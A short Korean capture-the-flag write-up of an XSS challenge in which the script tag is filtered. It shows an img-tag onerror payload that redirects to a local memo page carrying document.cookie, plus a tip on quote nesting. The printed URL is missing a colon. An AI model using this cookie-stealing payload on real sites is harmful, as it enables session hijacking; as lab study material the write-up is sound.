이번에는 앞선 문제에서 이어지는 xss 문제를 풀어보겠다.

이번에도 비슷한 문제이다.

🔎 XXS-2 분석

이번에도 똑같은 구조로 되어있다.

그런데 이번에는 vuln 페이지에 들어가도 alert 창이 뜨지 않는다.
script 태그가 막아져 있는 듯하다.

💻 소스코드 분석

소스코드도 저번과 똑같다. vuln.html의 코드가 살짝 바뀐 것 같다.
저번과 같은 코드이므로 분석을 생략하겠다.

📒 해답

우선 script 태그가 막혔기 때문에, 되는 태그를 찾아 보았다.
xss 공격에서 자주 쓰이는 img 태그가 먹힌다.

onerror 속성을 이용하여 아무 경로나 넣은 후 에러 발생 시 alert 창을 띄울 수 있다.

이것을 이용해서 param 값으로

<img src="" onerror="location.href='http//127.0.0.1:8000/memo?memo='+document.cookie">

라고 입력해주었다.

나는 몇 번 시도했는데 안되서 애를 먹었는데, 우선 onerror 다음에 전체를 큰 따옴표로 감싸야하고 큰 따옴표 안에는 작은 따옴표를 써줘야한다. 이런 실수를 하지 말길...

어쨌든 성공! 🌟